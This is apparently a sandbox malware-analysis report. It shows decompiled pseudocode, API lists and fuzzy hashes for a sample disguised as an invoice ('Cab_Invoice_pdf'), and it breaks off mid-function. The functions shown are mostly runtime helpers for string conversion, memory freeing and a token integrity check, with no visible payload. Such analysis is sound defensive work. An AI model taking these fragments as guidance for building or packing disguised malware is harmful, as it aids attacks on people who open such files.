                            Function 6E2F28C0, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 104COMMON
                            Download Yara Rule
                            APIs
                            • PyUnicode_FromString.PYTHON38(6E2F61FB), ref: 6E2F28F7
                            • memcpy.VCRUNTIME140(?), ref: 6E2F2968
                            • PyOS_snprintf.PYTHON38(?,00000100,%04X,?), ref: 6E2F29A9
                            • PyUnicode_FromStringAndSize.PYTHON38(?), ref: 6E2F29D2
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: FromStringUnicode_$S_snprintfSizememcpy
                            • String ID: $%04X
                            • API String ID: 3253253298-4013080060
                            • Opcode ID: 066fdfa67b077bbc190735b21b970d01d27a3f75ef6094be01783ad913b09316
                            • Instruction ID: 12b0e364c0786bcc08782d38fab4e5228c8360f295ac2cab0e1373cba5246afb
                            • Opcode Fuzzy Hash: 066fdfa67b077bbc190735b21b970d01d27a3f75ef6094be01783ad913b09316
                            • Instruction Fuzzy Hash: 87319AB394419EDBCB108FA8DC44AD9B7BAEF87301F2405A9DC8993200CA729E47C790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01314D40, Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 102COMMON
                            Download Yara Rule
                            C-Code - Quality: 56%
                            			E01314D40(void* __ecx, void* __edx, void* __eflags) {
				int* _t18;
				short* _t21;
				char* _t22;
				short* _t28;
				int* _t31;
				void* _t34;
				short* _t36;
				int* _t41;
				signed int _t42;
				char* _t44;
				int _t45;
				void* _t46;
				void* _t47;
				void* _t48;

				_t34 = __edx;
				_t44 =  *(_t46 + 0x14);
				_push(4);
				_push( &(_t44[1]));
				_t18 = E013197F8(__ecx);
				_t31 = _t18;
				_t47 = _t46 + 8;
				if(_t31 != 0) {
					_t36 = 0;
					__eflags = _t44;
					if(_t44 <= 0) {
						L17:
						_t31[_t44] = 0;
						return _t31;
					} else {
						_t41 = _t31;
						_t21 =  *(_t47 + 0x20) - _t31;
						__eflags = _t21;
						 *(_t47 + 0x20) = _t21;
						while(1) {
							_t22 =  *(_t21 + _t41);
							 *(_t47 + 0x28) = _t22;
							_t45 = MultiByteToWideChar(0xfde9, 0, _t22, 0xffffffff, 0, 0);
							__eflags = _t45;
							if(__eflags == 0) {
								break;
							}
							_t7 = _t45 + 1; // 0x1
							_push(2);
							_push(_t7);
							_t28 = E013197F8(_t7);
							_t47 = _t47 + 8;
							 *(_t47 + 0x14) = _t28;
							__eflags = _t28;
							if(__eflags == 0) {
								_push("Out of memory.");
								_push("win32_utils_from_utf8");
								goto L13;
							} else {
								__eflags = MultiByteToWideChar(0xfde9, 0,  *(_t47 + 0x1c), 0xffffffff, _t28, _t45);
								if(__eflags == 0) {
									_push("Failed to decode wchar_t from UTF-8\n");
									L12:
									_push("MultiByteToWideChar");
									L13:
									E01311860(_t34, __eflags);
									_t48 = _t47 + 8;
									 *_t41 = 0;
									_t42 = 0;
									__eflags = _t36;
									if(_t36 >= 0) {
										do {
											L01319803(_t31[_t42]);
											_t42 = _t42 + 1;
											_t48 = _t48 + 4;
											__eflags = _t42 - _t36;
										} while (_t42 <= _t36);
									}
									L01319803(_t31);
									__eflags = 0;
									return 0;
								} else {
									_t36 =  &(_t36[0]);
									_t44 =  *(_t47 + 0x1c);
									 *_t41 =  *(_t47 + 0x14);
									_t41 =  &(_t41[1]);
									__eflags = _t36 - _t44;
									if(_t36 >= _t44) {
										goto L17;
									} else {
										_t21 =  *(_t47 + 0x20);
										continue;
									}
								}
							}
							goto L18;
						}
						_push("Failed to get wchar_t buffer size.\n");
						goto L12;
					}
				} else {
					return _t18;
				}
				L18:
			}

















                            0x01314d40
                            0x01314d45
                            0x01314d49
                            0x01314d4e
                            0x01314d4f
                            0x01314d54
                            0x01314d56
                            0x01314d5b
                            0x01314d65
                            0x01314d67
                            0x01314d69
                            0x01314e43
                            0x01314e45
                            0x01314e53
                            0x01314d6f
                            0x01314d73
                            0x01314d75
                            0x01314d75
                            0x01314d77
                            0x01314d80
                            0x01314d80
                            0x01314d91
                            0x01314d9b
                            0x01314d9d
                            0x01314d9f
                            0x00000000
                            0x00000000
                            0x01314da1
                            0x01314da4
                            0x01314da6
                            0x01314da7
                            0x01314dac
                            0x01314daf
                            0x01314db3
                            0x01314db5
                            0x01314def
                            0x01314df4
                            0x00000000
                            0x01314db7
                            0x01314dcc
                            0x01314dce
                            0x01314de8
                            0x01314e00
                            0x01314e00
                            0x01314e05
                            0x01314e05
                            0x01314e0a
                            0x01314e0d
                            0x01314e13
                            0x01314e15
                            0x01314e17
                            0x01314e20
                            0x01314e23
                            0x01314e28
                            0x01314e29
                            0x01314e2c
                            0x01314e2c
                            0x01314e20
                            0x01314e31
                            0x01314e39
                            0x01314e42
                            0x01314dd0
                            0x01314dd4
                            0x01314dd5
                            0x01314dd9
                            0x01314ddb
                            0x01314dde
                            0x01314de0
                            0x00000000
                            0x01314de2
                            0x01314de2
                            0x00000000
                            0x01314de2
                            0x01314de0
                            0x01314dce
                            0x00000000
                            0x01314db5
                            0x01314dfb
                            0x00000000
                            0x01314dfb
                            0x01314d62
                            0x01314d62
                            0x01314d62
                            0x00000000

                            APIs
                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,01313951,?,00000000,01313951,?), ref: 01314D95
                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 01314DC6
                            Strings
                            • Out of memory., xrefs: 01314DEF
                            • Failed to get wchar_t buffer size., xrefs: 01314DFB
                            • Failed to decode wchar_t from UTF-8, xrefs: 01314DE8
                            • MultiByteToWideChar, xrefs: 01314E00
                            • win32_utils_from_utf8, xrefs: 01314DF4
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide
                            • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                            • API String ID: 626452242-306716450
                            • Opcode ID: 78c9afb99ccde7c4cb944330b405ea4341c58f3a312e30f6b9047e58445df7b4
                            • Instruction ID: 6582a99377bcf9e1854667b7a6b5f1c92d33b4cd34ed1d465d855fae31427794
                            • Opcode Fuzzy Hash: 78c9afb99ccde7c4cb944330b405ea4341c58f3a312e30f6b9047e58445df7b4
                            • Instruction Fuzzy Hash: 6A319DB1648306ABDB206F5CAC41F6BBB98EF8071DF440139FE54A7284E775D50483A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6E2F4533, Relevance: 10.6, APIs: 7, Instructions: 87COMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 87%
                            			E6E2F4533(void* __edx) {
				intOrPtr _t24;
				void* _t34;
				intOrPtr _t35;
				void* _t37;
				void* _t40;
				void* _t41;
				intOrPtr _t42;
				intOrPtr _t44;
				void* _t46;
				void* _t50;

				_t40 = __edx;
				E6E2F5090(_t34, _t41, 0x6e3f7628, 0xc);
				_t42 =  *((intOrPtr*)(_t46 + 0xc));
				if(_t42 != 0) {
					L3:
					 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
					if(_t42 == 1 || _t42 == 2) {
						_t35 =  *((intOrPtr*)(_t46 + 0x10));
						_t44 = E6E2F463E( *((intOrPtr*)(_t46 + 8)), _t42, _t35);
						 *((intOrPtr*)(_t46 - 0x1c)) = _t44;
						if(_t44 != 0) {
							_t44 = E6E2F4329(_t37,  *((intOrPtr*)(_t46 + 8)), _t42, _t35);
							 *((intOrPtr*)(_t46 - 0x1c)) = _t44;
							if(_t44 != 0) {
								goto L8;
							}
						}
					} else {
						_t35 =  *((intOrPtr*)(_t46 + 0x10));
						L8:
						_push(_t35);
						_t44 = E6E2F4A3C( *((intOrPtr*)(_t46 + 8)), _t42);
						 *((intOrPtr*)(_t46 - 0x1c)) = _t44;
						if(_t42 == 1 && _t44 == 0) {
							_push(_t35);
							_push((E6E2F4A3C( *((intOrPtr*)(_t46 + 8)), _t26) & 0xffffff00 | _t35 != 0x00000000) & 0x000000ff);
							E6E2F4483(_t35, _t40, _t42);
							_pop(_t37);
							E6E2F463E( *((intOrPtr*)(_t46 + 8)), _t44, _t35);
						}
						if(_t42 == 0 || _t42 == 3) {
							_t44 = E6E2F4329(_t37,  *((intOrPtr*)(_t46 + 8)), _t42, _t35);
							 *((intOrPtr*)(_t46 - 0x1c)) = _t44;
							if(_t44 != 0) {
								_t44 = E6E2F463E( *((intOrPtr*)(_t46 + 8)), _t42, _t35);
								 *((intOrPtr*)(_t46 - 0x1c)) = _t44;
							}
						}
					}
					 *(_t46 - 4) = 0xfffffffe;
					_t24 = _t44;
				} else {
					_t50 =  *0x6e3f8a48 - _t42; // 0x1
					if(_t50 > 0) {
						goto L3;
					} else {
						_t24 = 0;
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t46 - 0x10));
				return _t24;
			}













                            0x6e2f4533
                            0x6e2f453a
                            0x6e2f453f
                            0x6e2f4544
                            0x6e2f4555
                            0x6e2f4555
                            0x6e2f455c
                            0x6e2f4568
                            0x6e2f4575
                            0x6e2f4577
                            0x6e2f457c
                            0x6e2f458c
                            0x6e2f458e
                            0x6e2f4593
                            0x00000000
                            0x00000000
                            0x6e2f4593
                            0x6e2f4563
                            0x6e2f4563
                            0x6e2f4599
                            0x6e2f4599
                            0x6e2f45a3
                            0x6e2f45a5
                            0x6e2f45ab
                            0x6e2f45b1
                            0x6e2f45c3
                            0x6e2f45c4
                            0x6e2f45c9
                            0x6e2f45cf
                            0x6e2f45cf
                            0x6e2f45d6
                            0x6e2f45e7
                            0x6e2f45e9
                            0x6e2f45ee
                            0x6e2f45fa
                            0x6e2f4622
                            0x6e2f4622
                            0x6e2f45ee
                            0x6e2f45d6
                            0x6e2f4625
                            0x6e2f462c
                            0x6e2f4546
                            0x6e2f4546
                            0x6e2f454c
                            0x00000000
                            0x6e2f454e
                            0x6e2f454e
                            0x6e2f454e
                            0x6e2f454c
                            0x6e2f4631
                            0x6e2f463d

                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: dllmain_raw$Main@12dllmain_crt_dispatch
                            • String ID:
                            • API String ID: 3353612457-0
                            • Opcode ID: 2eaf3901fa00035ba5f9eb84cddd4954d5a7b7eb3885fd47a1c48cf04ac9a46c
                            • Instruction ID: e9e0b1a2c1739f1b6e3583bdadc122fb1e1c7465db502b87e30904455c21646a
                            • Opcode Fuzzy Hash: 2eaf3901fa00035ba5f9eb84cddd4954d5a7b7eb3885fd47a1c48cf04ac9a46c
                            • Instruction Fuzzy Hash: 0421A571D8016EEBDF615ED5CE409AEBB7ADF8565AF014419FC1456214D7B0CD038B90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0132534A, Relevance: 10.6, APIs: 7, Instructions: 80COMMON
                            Download Yara Rule
                            C-Code - Quality: 90%
                            			E0132534A(char* _a4, short* _a8) {
				int _v8;
				void* __ecx;
				short* _t10;
				short* _t14;
				int _t15;
				short* _t16;
				void* _t26;
				int _t27;
				void* _t29;
				short* _t35;
				short* _t39;
				short* _t40;

				_push(_t29);
				if(_a4 != 0) {
					_t39 = _a8;
					__eflags = _t39;
					if(__eflags != 0) {
						_push(_t26);
						E0132369E(_t29, __eflags);
						asm("sbb ebx, ebx");
						_t35 = 0;
						_t27 = _t26 + 1;
						 *_t39 = 0;
						_t10 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, 0, 0);
						_v8 = _t10;
						__eflags = _t10;
						if(_t10 != 0) {
							_t40 = E01320A25(_t29, _t10 + _t10);
							__eflags = _t40;
							if(_t40 != 0) {
								_t15 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, _t40, _v8);
								__eflags = _t15;
								if(_t15 != 0) {
									_t16 = _t40;
									_t40 = 0;
									_t35 = 1;
									__eflags = 1;
									 *_a8 = _t16;
								} else {
									E0131C998(GetLastError());
								}
							}
							E013209EB(_t40);
							_t14 = _t35;
						} else {
							E0131C998(GetLastError());
							_t14 = 0;
						}
					} else {
						 *((intOrPtr*)(E0131C9CE())) = 0x16;
						E01321788();
						_t14 = 0;
					}
					return _t14;
				}
				 *((intOrPtr*)(E0131C9CE())) = 0x16;
				E01321788();
				return 0;
			}















                            0x0132534f
                            0x01325354
                            0x0132536e
                            0x01325371
                            0x01325373
                            0x0132538c
                            0x0132538e
                            0x01325395
                            0x01325397
                            0x013253a0
                            0x013253a1
                            0x013253a5
                            0x013253ab
                            0x013253ae
                            0x013253b0
                            0x013253ca
                            0x013253cd
                            0x013253cf
                            0x013253dc
                            0x013253e2
                            0x013253e4
                            0x013253f8
                            0x013253fa
                            0x013253fe
                            0x013253fe
                            0x013253ff
                            0x013253e6
                            0x013253ed
                            0x013253f2
                            0x013253e4
                            0x01325402
                            0x01325407
                            0x013253b2
                            0x013253b9
                            0x013253be
                            0x013253be
                            0x01325375
                            0x0132537a
                            0x01325380
                            0x01325385
                            0x01325385
                            0x00000000
                            0x0132540c
                            0x0132535b
                            0x01325361
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ae7cf815cc7cb3aabf70240d027ce297018093b3876b48743a93561c47fb353b
                            • Instruction ID: 522dd09d1df05a845b50b4d6bb4f30b863c59a9b8abeb467239bbaf4ed12d6f2
                            • Opcode Fuzzy Hash: ae7cf815cc7cb3aabf70240d027ce297018093b3876b48743a93561c47fb353b
                            • Instruction Fuzzy Hash: 4811B772604239BBDB253F799C44AAFBAADEB81729F105618F815D7140DA7089018760
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01327F23, Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E01327F23(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E01327EE7(_t45, 7);
					E01327EE7(_t45 + 0x1c, 7);
					E01327EE7(_t45 + 0x38, 0xc);
					E01327EE7(_t45 + 0x68, 0xc);
					E01327EE7(_t45 + 0x98, 2);
					E013209EB( *((intOrPtr*)(_t45 + 0xa0)));
					E013209EB( *((intOrPtr*)(_t45 + 0xa4)));
					E013209EB( *((intOrPtr*)(_t45 + 0xa8)));
					E01327EE7(_t45 + 0xb4, 7);
					E01327EE7(_t45 + 0xd0, 7);
					E01327EE7(_t45 + 0xec, 0xc);
					E01327EE7(_t45 + 0x11c, 0xc);
					E01327EE7(_t45 + 0x14c, 2);
					E013209EB( *((intOrPtr*)(_t45 + 0x154)));
					E013209EB( *((intOrPtr*)(_t45 + 0x158)));
					E013209EB( *((intOrPtr*)(_t45 + 0x15c)));
					return E013209EB( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}




                            0x01327f29
                            0x01327f2e
                            0x01327f37
                            0x01327f42
                            0x01327f4d
                            0x01327f58
                            0x01327f66
                            0x01327f71
                            0x01327f7c
                            0x01327f87
                            0x01327f95
                            0x01327fa3
                            0x01327fb4
                            0x01327fc2
                            0x01327fd0
                            0x01327fdb
                            0x01327fe6
                            0x01327ff1
                            0x00000000
                            0x01328001
                            0x01328006

                            APIs
                              • Part of subcall function 01327EE7: _free.LIBCMT ref: 01327F10
                            • _free.LIBCMT ref: 01327F71
                              • Part of subcall function 013209EB: RtlFreeHeap.NTDLL(00000000,00000000,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?), ref: 01320A01
                              • Part of subcall function 013209EB: GetLastError.KERNEL32(?,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?,?), ref: 01320A13
                            • _free.LIBCMT ref: 01327F7C
                            • _free.LIBCMT ref: 01327F87
                            • _free.LIBCMT ref: 01327FDB
                            • _free.LIBCMT ref: 01327FE6
                            • _free.LIBCMT ref: 01327FF1
                            • _free.LIBCMT ref: 01327FFC
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: 31842975363fdc7e60a34090c20fd294c19c9162f9057cf8ba4ce59bff4adfb6
                            • Instruction ID: 4e8a999cd631be2a9efa90b18e16dabc4b586f82fe58bef6d3e92179e50681f8
                            • Opcode Fuzzy Hash: 31842975363fdc7e60a34090c20fd294c19c9162f9057cf8ba4ce59bff4adfb6
                            • Instruction Fuzzy Hash: E3110D71650B26ABE620F7B5CC07FCB77EC6F24718F404C19F39E66060DA75AD0846A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01314BF0, Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 61COMMON
                            Download Yara Rule
                            C-Code - Quality: 28%
                            			E01314BF0(short* _a4, char* _a8, int _a12) {
				void* _t17;
				void* _t18;
				int _t19;
				short* _t20;
				void* _t21;

				_t20 = _a4;
				if(_t20 != 0) {
					_t19 = _a12;
					goto L6;
				} else {
					_t19 = MultiByteToWideChar(0xfde9, _t20, _a8, 0xffffffff, _t20, _t20);
					_t26 = _t19;
					if(_t19 != 0) {
						_t3 = _t19 + 1; // 0x1
						_push(2);
						_t20 = E013197F8(_t17);
						_t21 = _t21 + 8;
						__eflags = _t20;
						if(__eflags != 0) {
							L6:
							__eflags = MultiByteToWideChar(0xfde9, 0, _a8, 0xffffffff, _t20, _t19);
							if(__eflags != 0) {
								return _t20;
							} else {
								_push("Failed to decode wchar_t from UTF-8\n");
								_push("MultiByteToWideChar");
								E01311860(_t18, __eflags);
								__eflags = 0;
								return 0;
							}
						} else {
							_push("Out of memory.");
							_push("win32_utils_from_utf8");
							E01311860(_t18, __eflags);
							__eflags = 0;
							return 0;
						}
					} else {
						_push("Failed to get wchar_t buffer size.\n");
						_push("MultiByteToWideChar");
						E01311860(_t18, _t26);
						return 0;
					}
				}
			}








                            0x01314bf1
                            0x01314bf8
                            0x01314c56
                            0x00000000
                            0x01314bfa
                            0x01314c0e
                            0x01314c10
                            0x01314c12
                            0x01314c2b
                            0x01314c2e
                            0x01314c36
                            0x01314c38
                            0x01314c3b
                            0x01314c3d
                            0x01314c5a
                            0x01314c6f
                            0x01314c71
                            0x01314c8e
                            0x01314c73
                            0x01314c73
                            0x01314c78
                            0x01314c7d
                            0x01314c85
                            0x01314c89
                            0x01314c89
                            0x01314c3f
                            0x01314c3f
                            0x01314c44
                            0x01314c49
                            0x01314c51
                            0x01314c55
                            0x01314c55
                            0x01314c14
                            0x01314c14
                            0x01314c19
                            0x01314c1e
                            0x01314c2a
                            0x01314c2a
                            0x01314c12

                            APIs
                            • MultiByteToWideChar.KERNEL32(0000FDE9,?,?,000000FF,?,?,?,?,01314117,?,?,00001000), ref: 01314C08
                              • Part of subcall function 01311860: GetLastError.KERNEL32(?,?), ref: 0131187D
                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,?,?,?,01314117,?,?,00001000), ref: 01314C69
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$ErrorLast
                            • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                            • API String ID: 1717984340-306716450
                            • Opcode ID: d9ac8dc41b34e30ca225d4eb0fae9cfa793ec6bd08d2d2bae69c0e0277dd156e
                            • Instruction ID: bfadb775df73f8b16adf56001fb02478da363a164cc6da01edd9fd3653822229
                            • Opcode Fuzzy Hash: d9ac8dc41b34e30ca225d4eb0fae9cfa793ec6bd08d2d2bae69c0e0277dd156e
                            • Instruction Fuzzy Hash: 7B012D3774423276CA25656F7C09ECB6698DFC0BBEF150625FA14A2284D250840582F6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01314920, Relevance: 10.6, APIs: 7, Instructions: 58COMMON
                            Download Yara Rule
                            C-Code - Quality: 66%
                            			E01314920() {
				void* _v4;
				void* _v8;
				long _v12;
				long _v16;
				void* _t18;
				void* _t28;
				void* _t30;
				long* _t32;

				_t32 =  &_v12;
				_v8 = 0xffffffff;
				_t30 = 0;
				_v12 = 0;
				_v4 = 0;
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v8) != 0 && (GetTokenInformation(_v8, 1, 0, 0,  &_v12) != 0 || GetLastError() == 0x7a)) {
					_push(_v16);
					_push(1);
					_t30 = E013197F8(_t28);
					_t32 =  &(_t32[2]);
					if(_t30 != 0 && GetTokenInformation(_v12, 1, _t30, _v16,  &_v16) != 0) {
						_push( &_v12);
						_push( *_t30);
						L01317858();
					}
				}
				L01319803(_t30);
				_t18 = _v8;
				if(_t18 != 0xffffffff) {
					CloseHandle(_t18);
				}
				return _v4;
			}











                            0x01314920
                            0x01314928
                            0x01314931
                            0x01314933
                            0x0131493d
                            0x01314950
                            0x01314974
                            0x01314978
                            0x0131497f
                            0x01314981
                            0x01314986
                            0x013149a6
                            0x013149a7
                            0x013149a9
                            0x013149a9
                            0x01314986
                            0x013149af
                            0x013149b4
                            0x013149bf
                            0x013149c2
                            0x013149c2
                            0x013149cf

                            APIs
                            • GetCurrentProcess.KERNEL32(00000008,?), ref: 01314941
                            • OpenProcessToken.ADVAPI32(00000000), ref: 01314948
                            • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 0131495F
                            • GetLastError.KERNEL32 ref: 01314969
                            • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 01314998
                            • ConvertSidToStringSidW.ADVAPI32(00000000,?), ref: 013149A9
                            • CloseHandle.KERNEL32(?,00000000,?,?,00000000,0131210F,?,?,00000000,?,00000000), ref: 013149C2
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                            • String ID:
                            • API String ID: 995526605-0
                            • Opcode ID: d9e7c75cbd4f7c29f14181eab21bfd550aed028c2aed4937994f1de27c12b109
                            • Instruction ID: 7b28f13aee81c888c5d56308a413377144d6b4a1f27dc37cd08678112421f0a0
                            • Opcode Fuzzy Hash: d9e7c75cbd4f7c29f14181eab21bfd550aed028c2aed4937994f1de27c12b109
                            • Instruction Fuzzy Hash: 1F11CE70504211BBDA249F68DD48B5FBFADAF40764F004928F988D1098D730C448CB96
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01328F51, Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                            Download Yara Rule
                            C-Code - Quality: 71%
                            			E01328F51(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t56;
				signed int _t58;
				short* _t60;
				signed int _t64;
				short* _t68;
				int _t76;
				short* _t79;
				signed int _t85;
				signed int _t88;
				void* _t93;
				void* _t94;
				int _t96;
				short* _t99;
				int _t101;
				int _t103;
				signed int _t104;
				short* _t105;
				void* _t108;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x133c008; // 0xa212446c
				_v8 = _t49 ^ _t104;
				_t101 = _a20;
				if(_t101 > 0) {
					_t76 = E0132CA63(_a16, _t101);
					_t108 = _t76 - _t101;
					_t4 = _t76 + 1; // 0x1
					_t101 = _t4;
					if(_t108 >= 0) {
						_t101 = _t76;
					}
				}
				_t96 = _a32;
				if(_t96 == 0) {
					_t96 =  *( *_a4 + 8);
					_a32 = _t96;
				}
				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					E0131786A();
					return _t54;
				} else {
					_t93 = _t54 + _t54;
					_t83 = _t93 + 8;
					asm("sbb eax, eax");
					if((_t93 + 0x00000008 & _t54) == 0) {
						_t79 = 0;
						__eflags = 0;
						L14:
						if(_t79 == 0) {
							L36:
							_t103 = 0;
							L37:
							E0132815E(_t79);
							_t54 = _t103;
							goto L38;
						}
